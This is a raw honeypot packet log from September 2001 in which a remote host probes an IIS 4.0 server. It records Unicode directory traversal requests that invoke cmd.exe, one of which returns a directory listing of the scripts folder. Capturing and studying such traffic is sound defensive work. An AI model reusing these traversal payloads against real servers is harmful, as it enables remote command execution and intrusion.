030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 36 3A 33 30 20 47 4D 54 0D 0A 43 6F 6E 74   :06:30 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25767) [2001-09-18 10:22:49]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=27146 flags=0 offset=0 TTL=128 chksum=57232
TCP:  port=80 -> dport: 1476  flags=***A***F seq=567020
      ack=485198772 off=5 res=0 win=8608 urp=0 chksum=34646
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25769) [2001-09-18 10:22:50]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=19119 flags=0 offset=0 TTL=118 chksum=2284
TCP:  port=1476 -> dport: 80  flags=*****R** seq=485198772
      ack=0 off=5 res=0 win=0 urp=0 chksum=20472
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25776) [2001-09-18 10:22:52]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=26801 flags=0 offset=0 TTL=118 chksum=60133
TCP:  port=2621 -> dport: 80  flags=******S* seq=488451082
      ack=0 off=6 res=0 win=8192 urp=0 chksum=29501
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25777) [2001-09-18 10:22:52]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=30730 flags=0 offset=0 TTL=128 chksum=53644
TCP:  port=80 -> dport: 2621  flags=***A**S* seq=625399
      ack=488451083 off=6 res=0 win=8760 urp=0 chksum=58867
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25789) [2001-09-18 10:22:53]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=51889 flags=0 offset=0 TTL=119 chksum=34793
TCP:  port=2621 -> dport: 80  flags=***A**** seq=488451083
      ack=625400 off=5 res=0 win=8760 urp=0 chksum=64944
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25790) [2001-09-18 10:22:53]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=117 ID=52145 flags=0 offset=0 TTL=119 chksum=34460
TCP:  port=2621 -> dport: 80  flags=***AP*** seq=488451083
      ack=625400 off=5 res=0 win=8760 urp=0 chksum=59769
Payload:  length = 71

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20   ./Admin.dll dll 
020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20   HTTP/1.0..Host: 
030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E   www..Connnection
040 : 3A 20 63 6C 6F 73 65                              : close
----------------------------------------------------------------------------
--
#(2 - 25792) [2001-09-18 10:22:53]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=318 ID=33290 flags=0 offset=0 TTL=128 chksum=50810
TCP:  port=80 -> dport: 2621  flags=***AP*** seq=625400
      ack=488451160 off=5 res=0 win=8683 urp=0 chksum=60274
Payload:  length = 278

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 36 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74 65   06:34 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C   th: 139....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63   d><body>The
proc
0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73   ess cannot acces
0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75   s the file becau
0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75   se it is being u
0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70   sed by another p
100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C   rocess.
</body><
110 : 2F 68 74 6D 6C 3E                                 /html>
----------------------------------------------------------------------------
--
#(2 - 25793) [2001-09-18 10:22:53]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=33546 flags=0 offset=0 TTL=128 chksum=50832
TCP:  port=80 -> dport: 2621  flags=***A***F seq=625678
      ack=488451160 off=5 res=0 win=8683 urp=0 chksum=64665
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25800) [2001-09-18 10:22:53]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=36786 flags=0 offset=0 TTL=118 chksum=50152
TCP:  port=2621 -> dport: 80  flags=*****R** seq=488451160
      ack=0 off=5 res=0 win=0 urp=0 chksum=43689
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25801) [2001-09-18 10:22:53]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=37042 flags=0 offset=0 TTL=118 chksum=49892
TCP:  port=2999 -> dport: 80  flags=******S* seq=490886960
      ack=0 off=6 res=0 win=8192 urp=0 chksum=18040
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25802) [2001-09-18 10:22:53]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=36362 flags=0 offset=0 TTL=128 chksum=48012
TCP:  port=80 -> dport: 2999  flags=***A**S* seq=626480
      ack=490886961 off=6 res=0 win=8760 urp=0 chksum=46325
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25803) [2001-09-18 10:22:53]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=37298 flags=0 offset=0 TTL=118 chksum=489
TCP:  port=2621 -> dport: 80  flags=*****R** seq=488451160
      ack=488451160 off=5 res=0 win=0 urp=0 chksum=24884
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25808) [2001-09-18 10:22:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=47026 flags=0 offset=0 TTL=119 chksum=39656
TCP:  port=2999 -> dport: 80  flags=***A**** seq=490886961
      ack=626481 off=5 res=0 win=8760 urp=0 chksum=52402
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25809) [2001-09-18 10:22:54]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=138 ID=47282 flags=0 offset=0 TTL=119 chksum=39302
TCP:  port=2999 -> dport: 80  flags=***AP*** seq=490886961
      ack=626481 off=5 res=0 win=8760 urp=0 chksum=23251
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
----------------------------------------------------------------------------
--
#(2 - 25810) [2001-09-18 10:22:54]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=38154 flags=0 offset=0 TTL=128 chksum=45620
TCP:  port=80 -> dport: 2999  flags=***AP*** seq=626481
      ack=490887059 off=5 res=0 win=8662 urp=0 chksum=33774
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 36 3A 33 34 20 47 4D 54 0D 0A 43    16:06:34 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25811) [2001-09-18 10:22:54]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=128 chksum=45968
TCP:  port=80 -> dport: 2999  flags=***A***F seq=627085
      ack=490887059 off=5 res=0 win=8662 urp=0 chksum=51797
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25820) [2001-09-18 10:22:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=60850 flags=0 offset=0 TTL=118 chksum=26088
TCP:  port=2999 -> dport: 80  flags=*****R** seq=490887059
      ack=0 off=5 res=0 win=0 urp=0 chksum=32207
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25821) [2001-09-18 10:22:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=61106 flags=0 offset=0 TTL=118 chksum=25828
TCP:  port=3040 -> dport: 80  flags=******S* seq=490887428
      ack=0 off=6 res=0 win=8192 urp=0 chksum=17531
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25822) [2001-09-18 10:22:54]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=41482 flags=0 offset=0 TTL=128 chksum=42892
TCP:  port=80 -> dport: 3040  flags=***A**S* seq=627281
      ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25823) [2001-09-18 10:22:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=61362 flags=0 offset=0 TTL=118 chksum=41960
TCP:  port=2999 -> dport: 80  flags=*****R** seq=490887059
      ack=490887059 off=5 res=0 win=0 urp=0 chksum=2298
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25860) [2001-09-18 10:22:57]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=51978 flags=0 offset=0 TTL=128 chksum=32396
TCP:  port=80 -> dport: 3040  flags=***A**S* seq=627281
      ack=490887429 off=6 res=0 win=8760 urp=0 chksum=45015
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25861) [2001-09-18 10:22:58]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=34741 flags=0 offset=0 TTL=119 chksum=51941
TCP:  port=3040 -> dport: 80  flags=***A**** seq=490887525
      ack=627282 off=5 res=0 win=8760 urp=0 chksum=50996
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25864) [2001-09-18 10:23:03]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=136 ID=27322 flags=0 offset=0 TTL=119 chksum=59264
TCP:  port=3040 -> dport: 80  flags=***AP*** seq=490887429
      ack=627282 off=5 res=0 win=8760 urp=0 chksum=35756
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 25865) [2001-09-18 10:23:03]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=60938 flags=0 offset=0 TTL=128 chksum=22836
TCP:  port=80 -> dport: 3040  flags=***AP*** seq=627282
      ack=490887525 off=5 res=0 win=8664 urp=0 chksum=32463
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 36 3A 34 34 20 47 4D 54 0D 0A 43    16:06:44 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25866) [2001-09-18 10:23:03]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=61194 flags=0 offset=0 TTL=128 chksum=23184
TCP:  port=80 -> dport: 3040  flags=***A***F seq=627886
      ack=490887525 off=5 res=0 win=8664 urp=0 chksum=50487
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25867) [2001-09-18 10:23:04]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=37306 flags=0 offset=0 TTL=118 chksum=49632
TCP:  port=3040 -> dport: 80  flags=*****R** seq=490887525
      ack=0 off=5 res=0 win=0 urp=0 chksum=31700
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25868) [2001-09-18 10:23:04]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=37562 flags=0 offset=0 TTL=118 chksum=49372
TCP:  port=3922 -> dport: 80  flags=******S* seq=491792565
      ack=0 off=6 res=0 win=8192 urp=0 chksum=29002
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25869) [2001-09-18 10:23:04]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=62218 flags=0 offset=0 TTL=128 chksum=22156
TCP:  port=80 -> dport: 3922  flags=***A**S* seq=636895
      ack=491792566 off=6 res=0 win=8760 urp=0 chksum=46872
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25870) [2001-09-18 10:23:04]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=37818 flags=0 offset=0 TTL=118 chksum=65504
TCP:  port=3040 -> dport: 80  flags=*****R** seq=490887525
      ack=490887525 off=5 res=0 win=0 urp=0 chksum=1325
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25871) [2001-09-18 10:23:04]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=51386 flags=0 offset=0 TTL=119 chksum=35296
TCP:  port=3922 -> dport: 80  flags=***A**** seq=491792566
      ack=636896 off=5 res=0 win=8760 urp=0 chksum=52949
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25872) [2001-09-18 10:23:04]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=140 ID=51642 flags=0 offset=0 TTL=119 chksum=34940
TCP:  port=3922 -> dport: 80  flags=***AP*** seq=491792566
      ack=636896 off=5 res=0 win=8760 urp=0 chksum=10943
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 25873) [2001-09-18 10:23:04]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=231 ID=63242 flags=0 offset=0 TTL=128 chksum=20945
TCP:  port=80 -> dport: 3922  flags=***AP*** seq=636896
      ack=491792666 off=5 res=0 win=8660 urp=0 chksum=31770
Payload:  length = 191

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F   .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65   ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30   : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 36 3A 34 35 20 47 4D 54 0D   01 16:06:45 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61   .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74   pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20   -stream..Volume 
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E   in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65   o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69    Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A      s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25874) [2001-09-18 10:23:04]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=451 ID=63498 flags=0 offset=0 TTL=128 chksum=20469
TCP:  port=80 -> dport: 3922  flags=***AP**F seq=637087
      ack=491792666 off=5 res=0 win=8660 urp=0 chksum=27215
Payload:  length = 411

000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A    Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31   ....09/18/01  11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52   :05a        <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39   >          ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20   /18/01  11:05a  
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20         <DIR>

070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30        ....09/18/0
080 : 31 20 20 31 31 3A 30 36 61 20 20 20 20 20 20 20   1  11:06a       
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
0a0 : 54 46 54 50 32 30 31 0D 0A 30 39 2F 31 38 2F 30   TFTP201..09/18/0
0b0 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20   1  11:04a       
0c0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
0d0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30   TFTP206..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
